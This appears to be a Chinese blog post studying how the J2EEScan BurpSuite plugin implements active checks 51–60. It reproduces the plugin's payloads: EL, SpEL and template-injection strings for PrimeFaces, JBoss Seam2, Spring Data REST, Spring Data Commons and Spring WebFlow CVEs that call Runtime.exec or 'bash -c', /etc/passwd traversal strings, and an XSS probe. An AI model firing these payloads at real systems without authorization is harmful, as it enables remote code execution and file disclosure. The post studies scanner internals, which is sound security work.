插件开发学习第10套。前置文章:
【BurpSuite】插件开发学习之Log4shell
【BurpSuite】插件开发学习之Software Vulnerability Scanner
【BurpSuite】插件开发学习之dotnet-Beautifier
【BurpSuite】插件开发学习之active-scan-plus-plus
【BurpSuite】插件开发学习之J2EEScan(上)-被动扫描
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(11-20)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(21-30)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(31-40)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(41-50)
路径
private static final List<String> staticURLFolders = Arrays.asList(
"/resources/",
"/files/",
"/upload/",
"/static/",
"/content/",
"/html/",
"/deploy/"
);
先判断真实的路径中有没有上述的path
for (String staticResourceFolder : staticURLFolders) {
if (currentPath.contains(staticResourceFolder)) {
然后将原始的HTTP做一个替换
String mutatedHTTPRequest = mutator(HTTPRequest, staticResourceFolder, staticResourceFolder + INJ);
替换的payload是
private static final String INJ = "file:/etc/passwd";
mutator函数就是一个找正则然后replace
private String mutator(String httpRequest, String staticResourceFolder, String payload) {
return httpRequest.replaceFirst(staticResourceFolder + ".* ", payload + " ");
}
payload
PAYLOADS.add("/javax.faces.resource/j2eescan.xhtml?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);
PAYLOADS.add("/javax.faces.resource/j2eescan.jsf?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);
private static final String INJ_TEST = "uMKljPgnOTVxmOB%2bH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVYjEh7SE3F4WmfKUle6apy2QGwABuVlzurPsgFxYP0G3b1dDqmgmxMw%3d%3d";
match返回包则存在漏洞
if (header.contains("J2EESCANPRIME")) {
这是个RCE
关键是这个pfdrid参数,是EL表达式的加密结果。
这里payload是加密下面的表达式,所以判断返回包是看headers
"${facesContext.getExternalContext().setResponseHeader(\\\"J2EESCANPRIME\\\",\\\"primefaces\\\")}"
默认密码是
Default = primefaces
利用工具看这个
https://github.com/pimps/CVE-2017-1000486
REST API Swagger 的相关问题
相关路径
private static final List<String> SWAGGER_APIS = Arrays.asList(
"/swagger-ui.html",
"/swagger/swagger-ui.html",
"/api/swagger-ui.html",
"/swagger/index.html",
"/%20/swagger-ui.html"
);
这个我们见得比较多了,这里面能拿到服务端的一些API构造。
match
private static final byte[] GREP_STRING = "Swagge"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li></ul></pre>
<h4><a name="t6"></a><a id="54Seam2RCEJboss__CVE20101871_108"></a>【54】Seam2RCE(Jboss) - CVE-2010-1871</h4>
<p>JBoss seam2的模板注入<br> payload</p>
<pre data-index="12" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> rawSimpleRequestSeam <span class="token operator">=</span> helpers<span class="token punctuation">.</span><span class="token function">addParameter</span><span class="token punctuation">(</span>rawRequest<span class="token punctuation">,</span>
helpers<span class="token punctuation">.</span><span class="token function">buildParameter</span><span class="token punctuation">(</span><span class="token string">"actionOutcome"</span><span class="token punctuation">,</span>
<span class="token string">"/pwd.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}"</span><span class="token punctuation">,</span> <span class="token class-name">IParameter</span><span class="token punctuation">.</span>PARAM_URL<span class="token punctuation">)</span>
<span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li></ul></pre>
<p>match的是hostname?</p>
<pre data-index="13" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING_L <span class="token operator">=</span> <span class="token string">"java.lang.UNIXProcess"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING_W <span class="token operator">=</span> <span class="token string">"java.lang.ProcessImpl"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li></ul></pre>
<p>上面的payload是直接反射取<br> 下面这个是遍历取,有一点绕过的感觉,</p>
<pre data-index="14" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> rawRequestSeam <span class="token operator">=</span> helpers<span class="token punctuation">.</span><span class="token function">addParameter</span><span class="token punctuation">(</span>rawRequest<span class="token punctuation">,</span>
helpers<span class="token punctuation">.</span><span class="token function">buildParameter</span><span class="token punctuation">(</span><span class="token string">"actionOutcome"</span><span class="token punctuation">,</span>
<span class="token string">"/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["</span> <span class="token operator">+</span> i <span class="token operator">+</span> <span class="token string">"].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}}"</span><span class="token punctuation">,</span> <span class="token class-name">IParameter</span><span class="token punctuation">.</span>PARAM_URL<span class="token punctuation">)</span>
<span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li></ul></pre>
<p>match一样</p>
<h4><a name="t7"></a><a id="55_SnoopResource_135"></a>【55】 SnoopResource</h4>
<p>看着像是GET请求的XSS<br> PATH</p>
<pre data-index="15" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> SNOOP_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
<span class="token string">"/snoop.jsp?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
<span class="token string">"/examples/jsp/snp/snoop.jsp?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
<span class="token string">"/examples/servlet/SnoopServlet?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
<span class="token string">"/servlet/SnoopServlet?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
<span class="token string">"/j2ee/servlet/SnoopServlet?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
<span class="token string">"/jsp-examples/snp/snoop.jsp?"</span> <span class="token operator">+</span> XSS_PAYLOAD
<span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li></ul></pre>
<p>payload用的h1标签</p>
<pre data-index="16" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">String</span> XSS_PAYLOAD <span class="token operator">=</span> <span class="token string">"<h1>j2eescan"</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li></ul></pre>
<p>有意思的是<br> match如果是</p>
<pre data-index="17" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING <span class="token operator">=</span> <span class="token string">"Path translated"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre>
<p>则是低危<br> 如果是</p>
<pre data-index="18" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><span class="token generics"><span class="token punctuation"><</span>h1<span class="token punctuation">></span></span>j2eescan"<span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li></ul></pre>
<p>就是中危</p>
<h4><a name="t8"></a><a id="56SpringBootActuator_169"></a>【56】SpringBootActuator</h4>
<p>遍历Path</p>
<pre data-index="19" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> SPRINGBOOT_ACTUATOR_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
<span class="token string">"/health"</span><span class="token punctuation">,</span>
<span class="token string">"/manager/health"</span><span class="token punctuation">,</span>
<span class="token string">"/actuator"</span><span class="token punctuation">,</span>
<span class="token string">"/actuator/jolokia/list"</span><span class="token punctuation">,</span>
<span class="token string">"/jolokia/list"</span><span class="token punctuation">,</span>
<span class="token string">"/env"</span>
<span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li></ul></pre>
<p>match这几个</p>
<pre data-index="20" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_STRINGS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
<span class="token string">"{\"status\":\"UP\"}"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token string">"{\"_links\":"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token string">"org.spring"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token string">"java.vendor"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li></ul></pre>
<p>SpringBoot 的内存泄露吧,之前因为这个页面泄露了大量用户token能直接接管用户账号,所以也并不是他描述的low,需要实际去看。</p>
<h4><a name="t9"></a><a id="57SpringBootRestRCE_cve20178046_195"></a>【57】SpringBootRestRCE cve-2017-8046</h4>
<p>首先POST换成PATCH(这里GET还不行?)</p>
<pre data-index="21" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> headers<span class="token punctuation">.</span><span class="token function">set</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> firstHeader<span class="token punctuation">.</span><span class="token function">replaceFirst</span><span class="token punctuation">(</span><span class="token string">"POST "</span><span class="token punctuation">,</span> <span class="token string">"PATCH "</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre>
<p>换个contenttype和accept</p>
<pre data-index="22" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> headersWithContentTypePatch <span class="token operator">=</span> <span class="token class-name">HTTPParser</span><span class="token punctuation">.</span><span class="token function">addOrUpdateHeader</span><span class="token punctuation">(</span>headers<span class="token punctuation">,</span> <span class="token string">"Content-type"</span><span class="token punctuation">,</span> <span class="token string">"application/json-patch+json"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> headersWithContentTypePatchAndAccept <span class="token operator">=</span> <span class="token class-name">HTTPParser</span><span class="token punctuation">.</span><span class="token function">addOrUpdateHeader</span><span class="token punctuation">(</span>headersWithContentTypePatch<span class="token punctuation">,</span> <span class="token string">"Accept"</span><span class="token punctuation">,</span> <span class="token string">"*/*"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li></ul></pre>
<p>发送payload</p>
<pre data-index="23" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token class-name">String</span> finalPayload <span class="token operator">=</span> <span class="token string">"[{ \"op\" : \"replace\", \"path\" : \"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("</span> <span class="token operator">+</span> payload <span class="token operator">+</span> <span class="token string">").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x\", \"value\" : \"j2eescan\" }]"</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre>
<p>无<a href="https://so.csdn.net/so/search?q=%E5%9B%9E%E6%98%BE&spm=1001.2101.3001.7020" target="_blank" class="hl hl-1" data-report-view="{"spm":"1001.2101.3001.7020","dest":"https://so.csdn.net/so/search?q=%E5%9B%9E%E6%98%BE&spm=1001.2101.3001.7020","extra":"{\"searchword\":\"回显\"}"}" data-report-click="{"spm":"1001.2101.3001.7020","dest":"https://so.csdn.net/so/search?q=%E5%9B%9E%E6%98%BE&spm=1001.2101.3001.7020","extra":"{\"searchword\":\"回显\"}"}" data-tit="回显" data-pretit="回显">回显</a>的话payload可以用ping dns来match</p>
<h4><a name="t10"></a><a id="58SpringCloudConfigPathTraversal__cve20205410_218"></a>【58】SpringCloudConfigPathTraversal cve-2020-5410</h4>
<p><img src="https://1000bd.com/contentImg/2023/11/09/104956565.png" alt=""><br> 2020年的洞<br> Spring Cloud Config的目录穿越,比较好构造<br> payload</p>
<pre data-index="24" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> SPRINGCLOUD_TRAVERSALS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
<span class="token string">"/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23"</span>
<span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li></ul></pre>
<p>match passwod就行</p>
<h4><a name="t11"></a><a id="59_SpringDataCommonRCE_cve20181273_232"></a>【59】 SpringDataCommonRCE cve-2018-1273</h4>
<blockquote>
<p>https://mp.weixin.qq.com/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483666&idx=1&sn=91e3b2aab354c55e0677895c02fb068c</p>
</blockquote>
<p>这是个spel表达式注入漏洞<br> 补丁大致就是将StandardEvaluationContext替代为SimpleEvaluationContext,由于StandardEvaluationContext权限过大,可以执行任意代码,会被恶意用户利用。<br> SimpleEvaluationContext的权限则小的多,只支持一些map结构,通用的jang.lang.Runtime,java.lang.ProcessBuilder都已经不再支持,详情可查看SimpleEvaluationContext的实现。<br> <img src="https://1000bd.com/contentImg/2023/11/09/104956512.png" alt="在这里插入图片描述"></p>
<p>payload</p>
<pre data-index="25" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token class-name">String</span> injection <span class="token operator">=</span> <span class="token string">"[#this.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\")]="</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre>
<p>替换的方式是</p>
<pre data-index="26" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token class-name">String</span> updatedBody <span class="token operator">=</span> requestBody<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"="</span><span class="token punctuation">,</span> finalPayload<span class="token punctuation">)</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre>
<p><img src="https://1000bd.com/contentImg/2023/11/09/104956794.png" alt="在这里插入图片描述"></p>
<h4><a name="t12"></a><a id="60SpringWebFlowDataBindExpression_CVE20174971_254"></a>【60】SpringWebFlowDataBindExpression CVE-2017-4971</h4>
<p>Spring WebFlow 2.4.0 - 2.4.4<br> payload一把梭</p>
<pre data-index="27" class="set-code-show prettyprint"><code class="prism language-java has-numbering" onclick="mdcp.signin(event)" style="position: unset;"> <span class="token class-name">String</span> injection <span class="token operator">=</span> <span class="token string">"_(new java.lang.ProcessBuilder(\"bash\",\"-c\",\"ping -c 3 %s\")).start()"</span><span class="token punctuation">;</span>
<div class="hljs-button signin" data-title="登录后复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style=""><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre>
<p><img src="https://1000bd.com/contentImg/2023/11/09/104956763.png" alt="在这里插入图片描述"><br> <img src="https://1000bd.com/contentImg/2023/11/09/104956662.png" alt="触发的"><br> 触发位置是提交表单。</p>
</div>
</div>
</li>
<li class="list-group-item ul-li">
<b>相关阅读:</b><br>
<nobr>
<a href="/Article/Index/829561">servlet</a> <br />
<a href="/Article/Index/1317195">[Linux] 1.Linux的简介</a> <br />
<a href="/Article/Index/1293295">一个由于全局变量造成express路由重复堆叠的问题案例</a> <br />
<a href="/Article/Index/1505183">Vue--》打造简易直播应用平台项目实战</a> <br />
<a href="/Article/Index/1416297">PowerPC T2080部分板卡产品介绍</a> <br />
<a href="/Article/Index/1202947">Netty(四)- NIO三大组件之Selector</a> <br />
<a href="/Article/Index/727330">基于SSM开发实现校园疫情防控管理系统</a> <br />
<a href="/Article/Index/751356">中国的机器人增长</a> <br />
<a href="/Article/Index/1393028">Android中使用Java计算指定日期、时间戳等方法的合集</a> <br />
<a href="/Article/Index/867065">微信小程序商城搭建二手汽车拍卖系统+后台管理系统|前后分离VUE.js</a> <br />
</nobr>
</li>
<li class="list-group-item from-a mb-2">
原文地址:https://blog.csdn.net/xiru9972/article/details/126925868
</li>
</ul>
</div>
<div class="col-lg-4 col-sm-12">
<ul class="list-group" style="word-break:break-all;">
<li class="list-group-item ul-li-bg" aria-current="true">
最新文章
</li>
<li class="list-group-item ul-li">
<nobr>
<a href="/Article/Index/1484446">攻防演习之三天拿下官网站群</a> <br />
<a href="/Article/Index/1515268">数据安全治理学习——前期安全规划和安全管理体系建设</a> <br />
<a href="/Article/Index/1759065">企业安全 | 企业内一次钓鱼演练准备过程</a> <br />
<a href="/Article/Index/1485036">内网渗透测试 | Kerberos协议及其部分攻击手法</a> <br />
<a href="/Article/Index/1877332">0day的产生 | 不懂代码的"代码审计"</a> <br />
<a href="/Article/Index/1887576">安装scrcpy-client模块av模块异常,环境问题解决方案</a> <br />
<a href="/Article/Index/1887578">leetcode hot100【LeetCode 279. 完全平方数】java实现</a> <br />
<a href="/Article/Index/1887512">OpenWrt下安装Mosquitto</a> <br />
<a href="/Article/Index/1887520">AnatoMask论文汇总</a> <br />
<a href="/Article/Index/1887496">【AI日记】24.11.01 LangChain、openai api和github copilot</a> <br />
</nobr>
</li>
</ul>
<ul class="list-group pt-2" style="word-break:break-all;">
<li class="list-group-item ul-li-bg" aria-current="true">
热门文章
</li>
<li class="list-group-item ul-li">
<nobr>
<a href="/Article/Index/888177">十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!</a> <br />
<a href="/Article/Index/797680">奉劝各位学弟学妹们,该打造你的技术影响力了!</a> <br />
<a href="/Article/Index/888183">五年了,我在 CSDN 的两个一百万。</a> <br />
<a href="/Article/Index/888179">Java俄罗斯方块,老程序员花了一个周末,连接中学年代!</a> <br />
<a href="/Article/Index/797730">面试官都震惊,你这网络基础可以啊!</a> <br />
<a href="/Article/Index/797725">你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法</a> <br />
<a href="/Article/Index/797702">心情不好的时候,用 Python 画棵樱花树送给自己吧</a> <br />
<a href="/Article/Index/797709">通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!</a> <br />
<a href="/Article/Index/797716">13 万字 C 语言从入门到精通保姆级教程2021 年版</a> <br />
<a href="/Article/Index/888192">10行代码集2000张美女图,Python爬虫120例,再上征途</a> <br />
</nobr>
</li>
</ul>
</div>
</div>
</div>
<!-- 主体 -->
<!--body结束-->
<!--这里是footer模板-->
<!--footer-->
<nav class="navbar navbar-inverse navbar-fixed-bottom">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="text-muted center foot-height">
Copyright © 2022 侵权请联系<a href="mailto:2656653265@qq.com">2656653265@qq.com</a>
<a href="https://beian.miit.gov.cn/" target="_blank">京ICP备2022015340号-1</a>
</div>
<div style="width:300px;margin:0 auto; padding:0px 5px;">
<a href="/regex.html">正则表达式工具</a>
<a href="/cron.html">cron表达式工具</a>
<a href="/pwdcreator.html">密码生成工具</a>
</div>
<div style="width:300px;margin:0 auto; padding:5px 0;">
<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=11010502049817" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;">
<img src="" style="float:left;" /><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">京公网安备 11010502049817号</p></a>
</div>
</div>
</div>
</div>
</nav>
<!--footer-->
<!--footer模板结束-->
<script src="/js/plugins/jquery/jquery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<!--这里是scripts模板-->
<!--scripts模板结束-->
</body>
</html>